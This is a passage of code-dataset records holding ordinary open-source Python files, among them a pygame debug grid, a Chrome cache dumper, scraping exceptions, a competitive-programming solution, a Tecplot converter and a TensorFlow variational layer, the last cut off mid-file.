1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31564975314","text":"import pygame\n\nfrom settings import *\n\npygame.font.init()\n\n\ndef db_show_grid():\n window = pygame.display.get_surface()\n text_font = pygame.font.SysFont('arial', TILE_WIDTH//4)\n\n for i in range(window.get_width()//TILE_WIDTH): \n for j in range(window.get_height()//TILE_HEIGHT): \n \n text_surf = text_font.render(f'[{i},{j}]',True,(255,0,0))\n text_rect = text_surf.get_rect(topleft=(i*TILE_WIDTH+5,j*TILE_HEIGHT))\n pygame.draw.rect(window,(0,0,0), (i*TILE_WIDTH,j*TILE_HEIGHT,TILE_WIDTH,TILE_HEIGHT), 2, 5)\n window.blit(text_surf,text_rect)\n\n\n","repo_name":"JamakaDev/pygame-side_scroller","sub_path":"src/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18804102205","text":"import sys\nimport os\nimport urllib\nimport uuid\nimport hashlib\n\nclass CacheDumper(object):\n def __init__(self, pathToDir=None, overwrite=True):\n \"\"\"\n Init cache manager\n \"\"\"\n self.pathToDir = pathToDir\n self.size_first = 15\n self.size_second = 15\n self.overwrite = overwrite\n\n\n def init(self):\n if not self.checkDir():\n self.initDir()\n\n def initDir(self):\n \"\"\"\n Generate cache directories\n \"\"\"\n print(\"Cache directories does not exist or are damaged, recreating directories now...\")\n\n if not os.path.exists(self.pathToDir):\n os.makedirs(self.pathToDir)\n\n for i in range(0, self.size_first + 1):\n dirpath = os.path.join(self.pathToDir, str(hex(i))[2:].zfill(1))\n if os.path.exists(dirpath):\n 
shutil.rmtree(dirpath)\n os.makedirs(dirpath)\n\n for j in range(0, self.size_second + 1):\n subdirpath = os.path.join(dirpath, str(hex(j))[2:].zfill(1))\n os.makedirs(subdirpath)\n\n print(\"Cache directories have been created successfully.\")\n\n\n def checkDir(self):\n \"\"\"\n Check if the cache directory already exists and is properly set up\n Return True if yes, otherwise return False\n \"\"\"\n print(\"Checking cache directories...\")\n if not os.path.exists(self.pathToDir):\n return False\n\n for i in range(0, self.size_first + 1):\n dirpath = os.path.join(self.pathToDir, str(hex(i))[2:].zfill(1))\n\n if not os.path.exists(dirpath):\n return False\n\n for j in range(0, self.size_second + 1):\n subdirpath = os.path.join(dirpath, str(hex(j))[2:].zfill(1))\n\n if not os.path.exists(subdirpath):\n return False\n\n print(\"Cache directories already exist, continuing...\")\n return True\n\n\n def insert(self, url, content, isHeader=False, ext=None):\n \"\"\"\n Insert entry to cache, return true if new entry is written into cache, false otherwise\n \"\"\"\n key, dirpath, filepath = self.genPathFromUrl(url, isHeader, ext)\n\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n elif os.path.exists(filepath) and not self.overwrite:\n return False\n\n with open(filepath, 'wb') as tempfile:\n if isinstance(content, str):\n tempfile.write(bytes(content, 'utf-8'))\n else:\n tempfile.write(content)\n\n return True\n\n\n def fetch(self, url, isHeader=False):\n key, dirpath, filepath = self.genPathFromUrl(url, isHeader)\n if not os.path.exists(filepath):\n return None\n\n content = None\n with open(filepath, 'r') as tempfile:\n content = tempfile.read()\n\n return content\n\n def genPathFromUrl(self, url, isHeader, ext=None):\n m = hashlib.md5()\n m.update(url.encode('utf-8'))\n key = m.hexdigest()\n\n first_dir, second_dir = key[0:1], key[1:2]\n dirpath = os.path.join(self.pathToDir, first_dir, second_dir, key)\n filepath = os.path.join(dirpath, \"header.txt\" if isHeader else (\"content\" + ext if ext else \"content\"))\n return key, dirpath, filepath\n","repo_name":"Yobretaw/ChromeCacheExtractor","sub_path":"src/dump_cache.py","file_name":"dump_cache.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"31445894395","text":"from bs4 import BeautifulSoup\n\n\nclass ScrapingError(Exception):\n \"\"\"\n Base class for exceptions related to Web Scraping\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n query_args: the arguments describing the information we were looking for\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, message):\n self.soup = soup\n self.query_args = query_args\n self.message = message\n\n super().__init__(self.message)\n\n\nclass ScrapingFindError(ScrapingError):\n \"\"\"\n Exception raised when data of interest was not found in the webpage being scraped\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n query_args: the arguments used in the search\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, message=None):\n self.soup = soup\n self.query_args = query_args\n\n if message:\n self.message = message\n else:\n self.message = f\"Failed to find the following contents in the BeautifulSoup object: {query_args}\"\n\n super().__init__(self.soup, self.query_args, self.message)\n\n\nclass ScrapingFormatError(ScrapingError):\n \"\"\"\n 
Exception raised when an assumption of the webpage's HTML format was violated\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n query_args: the arguments used in the search\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, message=None):\n self.soup = soup\n self.query_args = query_args\n\n if message:\n self.message = message\n else:\n self.message = f\"An assertion about the format of the webpage was violated: {query_args}\"\n\n super().__init__(self.soup, self.query_args, self.message)\n\n\nclass ScrapingValueError(ScrapingError):\n \"\"\"\n Exception raised when we find an unexpected value while scraping\n\n Attributes:\n soup: the [BeautifulSoup] object that we're scraping from\n property: the name of the property we're scraping\n value: the unexpected value that we found\n message: the message held by the exception\n \"\"\"\n\n def __init__(self, soup, query_args, property, value, message=None):\n self.soup = soup\n self.property = property\n self.value = value\n self.query_args = query_args\n\n if message:\n self.message = message\n else:\n self.message = f\"Found an unexpected value for the following property: {property}={value}\"\n\n super().__init__(self.soup, self.query_args, self.message)\n\n\ndef main():\n try:\n raise ScrapingFindError(None, {}, \"hi\")\n except ScrapingError as e:\n print(\"nice\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BieniekAlexander/ltt","sub_path":"backend/src/scraping/scraping_errors.py","file_name":"scraping_errors.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20258488426","text":"# UVa 10611 - The Playboy Chimp\n# https://onlinejudge.org/external/106/10611.pdf\n#\n# Author: eloyhz\n# Date: Sep/10/2020\n#\n\n\ndef taller(height, chimps):\n left = 0\n # Left invariant: chimps[left] <= height (left not is taller)\n if chimps[left] > height:\n return chimps[left]\n right = len(chimps) - 1\n # Right invariant: chimps[right] > height (right is taller)\n if chimps[right] <= height:\n return 'X'\n while right > left + 1:\n mid = (left + right) // 2\n if chimps[mid] > height:\n right = mid\n else:\n left = mid\n return chimps[right]\n\n\ndef shorter(height, chimps):\n left = 0\n # Left invariant: chimps[left] < height (left is shorter)\n if chimps[left] >= height:\n return 'X'\n right = len(chimps) - 1\n # Right invariant: chimps[right] >= height (right not is shorter)\n if chimps[right] < height:\n return chimps[right]\n while right > left + 1:\n mid = (left + right) // 2\n if chimps[mid] < height:\n left = mid\n else:\n right = mid\n return chimps[left]\n\n\nif __name__ == '__main__':\n n = int(input())\n chimps = [int(x) for x in input().split()]\n q = int(input())\n luchu = [int(x) for x in input().split()]\n for h in luchu:\n print(shorter(h, chimps), taller(h, chimps))\n\n","repo_name":"eloyhz/competitive-programming","sub_path":"UVa/uva10611_the_playboy_chimp.py","file_name":"uva10611_the_playboy_chimp.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27363386435","text":"import numpy as np \nimport os\nfrom datetime import datetime\n\ndim = 3\nnVar = 6 \n\ndef plot_tecplot(in_file, out_file):\n \n infile = open(in_file, \"r\")\n \n # Read header lines \n\n line = infile.readline()\n line = infile.readline()\n line = infile.readline()\n line = 
infile.readline()\n line = infile.readline()\n split_line = line.split()\n\n N_x = int(split_line[1])\n N_y = int(split_line[2])\n N_z = int(split_line[3])\n\n\n line = infile.readline()\n\n # Get number of cells in the mesh \n\n split_line = line.split()\n n_cells = int(split_line[1])\n\n W = np.zeros((n_cells,nVar))\n\n coords = np.zeros((n_cells,dim))\n\n # Read the coordinates \n\n for i in range(0, n_cells):\n line = infile.readline()\n split_line = line.split()\n coords[i, 0] = np.float64(split_line[0])\n coords[i, 1] = np.float64(split_line[1])\n coords[i, 2] = np.float64(split_line[2])\n\n # Read some more headers \n \n line = infile.readline()\n line = infile.readline()\n line = infile.readline()\n\n for i in range(0, n_cells):\n line = infile.readline()\n split_line = line.split()\n for c in range (0, nVar):\n W[i,c] = np.float64(split_line[c])\n \n infile.close()\n\n # Reshape arrays to fit rectangular coordinates \n\n coords = coords.reshape((N_z, N_y, N_x, dim))\n W = W.reshape((N_z, N_y, N_x, nVar))\n\n # Start plotting \n \n outfile = open(out_file, \"w+\")\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n \n print(\"TITLE = \\\"Euler Equations. File created on: \", dt_string, \"\\\"\", file = outfile)\n outfile.write(\"\\nVARIABLES = \\\"x\\\", \\\"y\\\", \\\"z\\\", \\\"Density\\\", \\\"V_x\\\", \\\"V_y\\\", \\\"V_z\\\", \\\"Pressure\\\", \\\"Phi\\\" \")\n print('\\nZone I = ', N_x, \"J = \", N_y, \"K = \", N_z, file = outfile) \n \n for k in range(0, N_z):\n for j in range(0, N_y):\n for i in range (0, N_x):\n print(coords[k,j,i,0], coords[k,j,i,1], coords[k,j,i,2], W[k,j,i,0], W[k,j,i,1], W[k,j,i,2], W[k,j,i,3], W[k,j,i,4], W[k,j,i,5], file = outfile)\n\n \n outfile.close()\n###############################################################################################################################\n\nfor in_file in os.listdir('.'):\n if in_file.endswith('.vtk'):\n print(in_file)\n out_file = in_file.replace(\"vtk\", \"dat\")\n plot_tecplot(in_file, out_file)\n\n","repo_name":"MaguRaam/kirchhoff_petsc","sub_path":"box/bubble_euler/plot_tecplot.py","file_name":"plot_tecplot.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70354080836","text":"import numpy as np\n\nfrom ..trie import Trie\nfrom .utilities import missing_subfaces\n\n\ndef simplicial_edit_distance(H, min_size=2, exclude_min_size=True, normalize=True):\n \"\"\"Computes the simplicial edit distance.\n\n The number of edges needed to be added\n to a hypergraph to make it a simplicial complex.\n\n Parameters\n ----------\n H : xgi.Hypergraph\n The hypergraph of interest\n min_size: int, default: 1\n The minimum hyperedge size to include when\n calculating whether a hyperedge is a simplex\n by counting subfaces.\n\n Returns\n -------\n int\n The edit simpliciality\n \"\"\"\n\n edges = (\n H.edges.maximal().filterby(\"size\", min_size + exclude_min_size, \"geq\").members()\n )\n\n t = Trie()\n t.build_trie(H.edges.members())\n\n ms = set()\n for e in edges:\n ms.update(missing_subfaces(H, e, min_size=min_size))\n try:\n s = H.num_edges\n m = len(ms)\n\n if normalize:\n return m / (m + s)\n else:\n return m\n except ZeroDivisionError:\n return 
np.nan\n","repo_name":"nwlandry/the-simpliciality-of-higher-order-networks","sub_path":"sod/simpliciality/simplicial_edit_distance.py","file_name":"simplicial_edit_distance.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"8057603447","text":"import sqlite3\n\n\nclass DB:\n\n def __init__(self, name):\n self.name = name\n self.connection = None\n self.cursor = None\n\n def __enter__(self):\n self.connection = sqlite3.connect(self.name)\n self.cursor = self.connection.cursor()\n return self.cursor\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.commit()\n self.connection.close()\n self.cursor = self.connection = None\n\ndb = DB('sql_den.db')\nwith db as cur:\n cur.execute(\"\"\"create table if not exists users(name, age, city);\"\"\")\n cur.execute(\"\"\"insert into users values ('Den Voropaev', 28, 'Vitebsk');\"\"\")\n cur.execute(\"\"\"insert into users values ('Mark Voropaev', 2, 'Vitebsk');\"\"\")\n","repo_name":"denvoropaev94/tasks_book_python","sub_path":"oop/with_sql.py","file_name":"with_sql.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17529986521","text":"import datetime\nfrom dateToTimestamp import dateToTimestamp\nfrom query import query\nimport dash\nimport dash_core_components as dcc\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nimport data\n\nfrom navbar import navbar\n\n\ndef percentChange(currency1, currency2, startDate=datetime.date(2012, 1, 1), endDate=datetime.date.today()):\n start = dateToTimestamp(startDate)\n end = dateToTimestamp(endDate)\n currencies = [currency1, currency2]\n \n queryStr = 'SELECT DMIX.{0}.DATE_TXT, '.format(currencies[0])\n if currency1 == currency2:\n queryStr = queryStr + '((DMIX.{0}.CLOSE - DMIX.{0}.OPEN) / DMIX.{0}.OPEN), '.format(currency1)\n queryStr = queryStr + '((DMIX.{0}.CLOSE - DMIX.{0}.OPEN) / DMIX.{0}.OPEN) AS COPYOF{0}'.format(currency1)\n queryStr = queryStr + ' FROM DMIX.{0}'.format(currency1)\n else:\n position = 0\n while position < len(currencies):\n if position != 0:\n queryStr = queryStr + ', '\n queryStr = queryStr + '((DMIX.{0}.CLOSE - DMIX.{0}.OPEN) / DMIX.{0}.OPEN)'.format(currencies[position])\n position = position + 1;\n position = 0\n queryStr = queryStr + ' FROM '\n while position < len(currencies):\n if position == 0:\n queryStr = queryStr + \"DMIX.\" + currencies[position]\n else:\n queryStr = queryStr + ' INNER JOIN DMIX.{1} ON DMIX.{0}.DATE_TXT = DMIX.{1}.DATE_TXT'.format(currencies[0],\n currencies[\n position])\n position = position + 1\n queryStr = queryStr + \" WHERE {0}.DATE_TXT >= TO_DATE('{1}-{2}-{3}', 'MM-DD-YYYY')\".format(currencies[0], str(startDate.month).rjust(2, '0'), str(startDate.day).rjust(2, '0'), str(startDate.year).rjust(4, '0'))\n queryStr = queryStr + \" AND {0}.DATE_TXT <= TO_DATE('{1}-{2}-{3}', 'MM-DD-YYYY')\".format(currencies[0], str(endDate.month).rjust(2, '0'), str(endDate.day).rjust(2, '0'), str(endDate.year).rjust(4, '0'))\n for currency in currencies:\n queryStr = queryStr + ' AND DMIX.{0}.OPEN > 0'.format(currency)\n queryStr = queryStr + ' ORDER BY DMIX.{0}.DATE_TXT ASC'.format(currencies[0])\n\n headers = currencies\n if currency1 == currency2:\n headers[1] = 'Copy of ' + headers[1]\n headers.insert(0, \"datetime\")\n return query(queryStr, headers)\n\n\ndef percentChangePage():\n layout = html.Div([\n navbar(),\n 
dbc.Row([\n dbc.Col([html.H6('Crypto-Currencies:'),\n dcc.Dropdown(\n id='percent-change-currency-1',\n options=[{'label': i, 'value': i} for i in data.CURRENCIES],\n value='BTC',\n multi=False\n ),\n dcc.Dropdown(\n id='percent-change-currency-2',\n options=[{'label': i, 'value': i} for i in data.CURRENCIES],\n value='ETH',\n multi=False\n ),\n html.Div([\n html.Div([\n html.H6('Start Date:'),\n dcc.DatePickerSingle(\n id='percent-change-start',\n min_date_allowed=data.MIN_DATE,\n max_date_allowed=data.MAX_DATE,\n date=data.DEFAULT_DATE\n )],\n style={'display': 'inline-block'}),\n html.Div([\n html.H6('End Date:'),\n dcc.DatePickerSingle(\n id='percent-change-end',\n min_date_allowed=data.MIN_DATE,\n max_date_allowed=data.MAX_DATE,\n date=data.MAX_DATE\n )],\n style={'display': 'inline-block'})])],\n md=4),\n dbc.Col([dcc.Graph(id='percent-change-graph')])\n ]),\n dbc.Row([\n html.Div([\n html.P(\"\"\"\n This page demonstrates the correlation, or lack thereof, between the price shifts of two cryptocurrencies.\n Due to the nature of cryptocurrency as a collective platform without merit-based backing for its value,\n changes in the price of one coin have been anecdotally known to create changes in the price of others. For instance,\n Ethereum (ETH) and Bitcoin (BTC) are both built upon the Ethereum blockchain, meaning price changes of one modify the\n amount of money in circulation in the blockchain, resulting in changes in the value of both currencies.\n The graph shown above attempts to visualize this trend by showcasing the percent change in price for each hour of a currency's\n data relative to that of another. The percent change in price is calculated internally for each row of data by finding the difference\n between the closing and opening price of the currency in the given hour and dividing that by the opening price.\n The degree to which changes in the price of two cryptocurrencies correlate can be visualized by how similar the data is to a line y = ax.\n As an example, selecting the same currency twice places the data points along the line x=y, as the relationship between a currency's\n percentage price changes and themselves is one-to-one. The more a relationship between two currencies deviates from this standard, outliers notwithstanding, the less\n correlated their price shifts can be considered to be.\n Hovering over a given data point will provide information on when it was collected, allowing for easier consideration of outliers and what may have caused them.\n Key concepts covered for this query included the use of row-internal data calculations to determine overall trends in a data set and the comparison of two sets relative to each other in the same visualization.\n \"\"\")\n ], style = {'margin-left' : '30px', 'margin-right' : '30px'})\n ])\n ])\n return layout\n","repo_name":"kcdea/Database_Project","sub_path":"percentChange.py","file_name":"percentChange.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18120368831","text":"from webviz_plotly import FilteredPlotly\nimport warnings\n\n\nclass BarChart(FilteredPlotly):\n \"\"\"Bar chart page element.\n\n :param data: Either a file path to a `csv` file or a\n :class:`pandas.DataFrame`. If a dataframe is given, each column is one\n set of bars in the chart. The dataframe index is used for the\n horizontal values. 
Similarly for the `csv` file, where a special\n column named ``index`` will be used for the horizontal values.\n :param barmode: Either ``'group'``, ``'stack'``, ``'relative'`` or\n ``'overlay'``. Defines how multiple bars per index-value are combined.\n See `plotly.js layout-barmode `_.\n \"\"\"\n def __init__(self, data, barmode='group', logy=False, *args, **kwargs):\n self.logy = logy\n super(BarChart, self).__init__(\n data,\n *args,\n logy=logy,\n layout={'barmode': barmode},\n **kwargs)\n\n def process_data(self, data):\n x = data.index.tolist()\n\n bars = []\n\n for column in data.columns:\n if self.logy and any(x <= 0 for x in data[column].tolist()\n if not isinstance(x, str)):\n warnings.warn('Non-positive values are not supported in a'\n ' logarithmic scale.')\n\n bars.append({\n 'y': data[column].tolist(),\n 'x': x,\n 'type': 'bar',\n 'name': column\n })\n\n return bars\n","repo_name":"equinor/webviz-archived","sub_path":"visualizations/bar_chart/webviz_bar_chart/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"61"} +{"seq_id":"16596204131","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom tensorflow.contrib.distributions.python.ops import deterministic as deterministic_lib\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.layers import base as layers_lib\nfrom tensorflow.python.ops import init_ops\nfrom tensorflow.python.ops import nn\nfrom tensorflow.python.ops import nn_ops\nfrom tensorflow.python.ops import standard_ops\nfrom tensorflow.python.ops.distributions import kullback_leibler as kl_lib\nfrom tensorflow.python.ops.distributions import normal as normal_lib\n\n\n__all__ = [\n \"DenseVariational\",\n \"dense_variational\",\n \"default_loc_scale_fn\",\n \"default_mean_field_normal_fn\",\n]\n\n\ndef default_loc_scale_fn(\n is_singular=False,\n loc_initializer=init_ops.random_normal_initializer(stddev=0.1),\n untransformed_scale_initializer=init_ops.random_normal_initializer(\n mean=-3., stddev=0.1),\n loc_regularizer=None,\n untransformed_scale_regularizer=None,\n loc_constraint=None,\n untransformed_scale_constraint=None):\n \"\"\"Makes closure which creates `loc`, `scale` params from `tf.get_variable`.\n\n This function produces a closure which produces `loc`, `scale` using\n `tf.get_variable`. The closure accepts the following arguments:\n\n dtype: Type of parameter's event.\n shape: Python `list`-like representing the parameter's event shape.\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Args:\n is_singular: Python `bool` indicating if `scale is None`. Default: `False`.\n loc_initializer: Initializer function for the `loc` parameters.\n The default is `tf.random_normal_initializer(mean=0., stddev=0.1)`.\n untransformed_scale_initializer: Initializer function for the `scale`\n parameters. Default value: `tf.random_normal_initializer(mean=-3.,\n stddev=0.1)`. This implies the softplus transformed result has mean\n approximately `0.05` and std. 
deviation approximately `0.005`.\n loc_regularizer: Regularizer function for the `loc` parameters.\n The default (`None`) is to use the `tf.get_variable` default.\n untransformed_scale_regularizer: Regularizer function for the `scale`\n parameters. The default (`None`) is to use the `tf.get_variable` default.\n loc_constraint: An optional projection function to be applied to the\n loc after being updated by an `Optimizer`. The function must take as input\n the unprojected variable and must return the projected variable (which\n must have the same shape). Constraints are not safe to use when doing\n asynchronous distributed training.\n The default (`None`) is to use the `tf.get_variable` default.\n untransformed_scale_constraint: An optional projection function to be\n applied to the `scale` parameters after being updated by an `Optimizer`\n (e.g. used to implement norm constraints or value constraints). The\n function must take as input the unprojected variable and must return the\n projected variable (which must have the same shape). Constraints are not\n safe to use when doing asynchronous distributed training. The default\n (`None`) is to use the `tf.get_variable` default.\n\n Returns:\n default_loc_scale_fn: Python `callable` which instantiates `loc`, `scale`\n parameters from args: `dtype, shape, name, trainable, add_variable_fn`.\n \"\"\"\n def _fn(dtype, shape, name, trainable, add_variable_fn):\n \"\"\"Creates `loc`, `scale` parameters.\"\"\"\n loc = add_variable_fn(\n name=name + \"_loc\",\n shape=shape,\n initializer=loc_initializer,\n regularizer=loc_regularizer,\n constraint=loc_constraint,\n dtype=dtype,\n trainable=trainable)\n if is_singular:\n return loc, None\n untransformed_scale = add_variable_fn(\n name=name + \"_untransformed_scale\",\n shape=shape,\n initializer=untransformed_scale_initializer,\n regularizer=untransformed_scale_regularizer,\n constraint=untransformed_scale_constraint,\n dtype=dtype,\n trainable=trainable)\n scale = (np.finfo(dtype.as_numpy_dtype).eps +\n nn_ops.softplus(untransformed_scale))\n return loc, scale\n return _fn\n\n\ndef default_mean_field_normal_fn(\n is_singular=False,\n loc_initializer=None,\n untransformed_scale_initializer=None,\n loc_regularizer=None,\n untransformed_scale_regularizer=None,\n loc_constraint=None,\n untransformed_scale_constraint=None):\n \"\"\"Creates a function to build Normal distributions with trainable params.\n\n This function produces a closure which produces `tf.distributions.Normal`\n parameterized by a loc` and `scale` each created using `tf.get_variable`. The\n produced closure accepts the following arguments:\n\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n shape: Python `list`-like representing the parameter's event shape.\n dtype: Type of parameter's event.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n\n Args:\n is_singular: Python `bool` if `True`, forces the special case limit of\n `scale->0`, i.e., a `Deterministic` distribution.\n loc_initializer: Initializer function for the `loc` parameters.\n If `None` (default), values are initialized using the default\n initializer used by `tf.get_variable`.\n untransformed_scale_initializer: Initializer function for the `scale`\n parameters. 
If `None` (default), values are initialized using the default\n initializer used by `tf.get_variable`.\n loc_regularizer: Regularizer function for the `loc` parameters.\n untransformed_scale_regularizer: Regularizer function for the `scale`\n parameters.\n loc_constraint: An optional projection function to be applied to the\n loc after being updated by an `Optimizer`. The function must take as input\n the unprojected variable and must return the projected variable (which\n must have the same shape). Constraints are not safe to use when doing\n asynchronous distributed training.\n untransformed_scale_constraint: An optional projection function to be\n applied to the `scale` parameters after being updated by an `Optimizer`\n (e.g. used to implement norm constraints or value constraints). The\n function must take as input the unprojected variable and must return the\n projected variable (which must have the same shape). Constraints are not\n safe to use when doing asynchronous distributed training.\n\n Returns:\n make_normal_fn: Python `callable` which creates a `tf.distributions.Normal`\n using from args: `dtype, shape, name, trainable, add_variable_fn`.\n \"\"\"\n loc_scale_fn_ = default_loc_scale_fn(\n is_singular,\n loc_initializer,\n untransformed_scale_initializer,\n loc_regularizer,\n untransformed_scale_regularizer,\n loc_constraint,\n untransformed_scale_constraint)\n def _fn(dtype, shape, name, trainable, add_variable_fn):\n \"\"\"Creates a batch of `Deterministic` or `Normal` distributions.\"\"\"\n loc, scale = loc_scale_fn_(dtype, shape, name, trainable, add_variable_fn)\n if scale is None:\n return deterministic_lib.Deterministic(loc=loc)\n return normal_lib.Normal(loc=loc, scale=scale)\n return _fn\n\n\nclass DenseVariational(layers_lib.Layer):\n \"\"\"Densely-connected variational class.\n\n This layer implements the Bayesian variational inference analogue to:\n `outputs = activation(matmul(inputs, kernel) + bias)`\n by assuming the `kernel` and/or the `bias` are random variables.\n\n The layer implements a stochastic dense calculation by making a Monte Carlo\n approximation of a [variational Bayesian method based on KL divergence](\n https://en.wikipedia.org/wiki/Variational_Bayesian_methods), i.e.,\n\n ```none\n -log p(y|x) = -log int_{R**d} p(y|x,w) p(w) dw\n = -log int_{R**d} p(y,w|x) q(w|x) / q(w|x) dw\n <= E_q(W|x)[-log p(y,W|x) + log q(W|x)] # Jensen's\n = E_q(W|x)[-log p(y|x,W)] + KL[q(W|x), p(W)]\n ~= m**-1 sum{ -log(y|x,w[j]) : w[j] ~ q(W|x), j=1..m }\n + KL[q(W|x), p(W)]\n ```\n\n where `W` denotes the (independent) `kernel` and `bias` random variables, `w`\n is a random variate or outcome of `W`, `y` is the label, `x` is the evidence`,\n and `~=` denotes an approximation which becomes exact as `m->inf`. The above\n bound is sometimes referred to as the negative Evidence Lower BOund or\n negative [ELBO](https://arxiv.org/abs/1601.00670). In context of a DNN, this\n layer is appropriate to use when the final loss is a negative log-likelihood.\n\n The Monte-Carlo sum portion is used for the feed-forward calculation of the\n DNN. 
The KL divergence portion can be added to the final loss via:\n `loss += sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))`.\n\n The arguments permit separate specification of the surrogate posterior\n (`q(W|x)`), prior (`p(W)`), and divergence for both the `kernel` and `bias`\n random variables (which together comprise `W`).\n\n Args:\n units: Integer or Long, dimensionality of the output space.\n activation: Activation function (`callable`). Set it to None to maintain a\n linear activation.\n activity_regularizer: Regularizer function for the output.\n trainable: Boolean, if `True` also add variables to the graph collection\n `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n kernel_use_local_reparameterization: Python `bool` indicating whether\n `kernel` calculation should employ the Local Reparameterization Trick.\n When `True`, `kernel_posterior_fn` must create an instance of\n `tf.distributions.Normal`.\n kernel_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `kernel` parameter. Default value:\n `default_mean_field_normal_fn()`.\n kernel_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n kernel_prior_fn: Python `callable` which creates `tf.distributions`\n instance. See `default_mean_field_normal_fn` docstring for required\n parameter signature.\n Default value: `tf.distributions.Normal(loc=0., scale=1.)`.\n kernel_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n bias_posterior_fn: Python `callable` which creates\n `tf.distributions.Distribution` instance representing the surrogate\n posterior of the `bias` parameter. Default value:\n `default_mean_field_normal_fn(is_singular=True)` (which creates an\n instance of `tf.distributions.Deterministic`).\n bias_posterior_tensor_fn: Python `callable` which takes a\n `tf.distributions.Distribution` instance and returns a representative\n value. Default value: `lambda d: d.sample()`.\n bias_prior_fn: Python `callable` which creates `tf.distributions` instance.\n See `default_mean_field_normal_fn` docstring for required parameter\n signature. Default value: `None` (no prior, no variational inference)\n bias_divergence_fn: Python `callable` which takes the surrogate posterior\n distribution, prior distribution and random variate sample(s) from the\n surrogate posterior and computes or approximates the KL divergence. The\n distributions are `tf.distributions.Distribution`-like instances and the\n sample is a `Tensor`.\n name: Python `str`, the name of the layer. 
Layers with the same name will\n share `tf.Variable`s, but to avoid mistakes we require `reuse=True` in\n such cases.\n reuse: Python `bool`, whether to reuse the `tf.Variable`s of a previous\n layer by the same name.\n\n Properties:\n units: Python integer, dimensionality of the output space.\n activation: Activation function (`callable`).\n activity_regularizer: Regularizer function for the output.\n kernel_use_local_reparameterization: Python `bool` indicating whether\n `kernel` calculation should employ the Local Reparameterization Trick.\n kernel: `VariationalKernelParamater` instance containing all `kernel`\n related properties and `callable`s.\n bias: `VariationalParameter` instance containing all `kernel`\n related properties and `callable`s.\n \"\"\"\n\n def __init__(\n self,\n units,\n activation=None,\n activity_regularizer=None,\n trainable=True,\n kernel_use_local_reparameterization=True,\n kernel_posterior_fn=default_mean_field_normal_fn(),\n kernel_posterior_tensor_fn=lambda d: d.sample(),\n kernel_prior_fn=lambda dtype, *args: normal_lib.Normal( # pylint: disable=g-long-lambda\n loc=dtype.as_numpy_dtype(0.), scale=dtype.as_numpy_dtype(1.)),\n kernel_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n bias_posterior_fn=default_mean_field_normal_fn(is_singular=True),\n bias_posterior_tensor_fn=lambda d: d.sample(),\n bias_prior_fn=None,\n bias_divergence_fn=lambda q, p, ignore: kl_lib.kl_divergence(q, p),\n name=None,\n **kwargs):\n super(DenseVariational, self).__init__(\n trainable=trainable,\n name=name,\n activity_regularizer=activity_regularizer,\n **kwargs)\n self._units = units\n self._activation = activation\n self._input_spec = layers_lib.InputSpec(min_ndim=2)\n self._kernel_use_local_reparameterization = (\n kernel_use_local_reparameterization)\n self._kernel = VariationalKernelParameter(\n kernel_posterior_fn,\n kernel_posterior_tensor_fn,\n kernel_prior_fn,\n kernel_divergence_fn)\n self._bias = 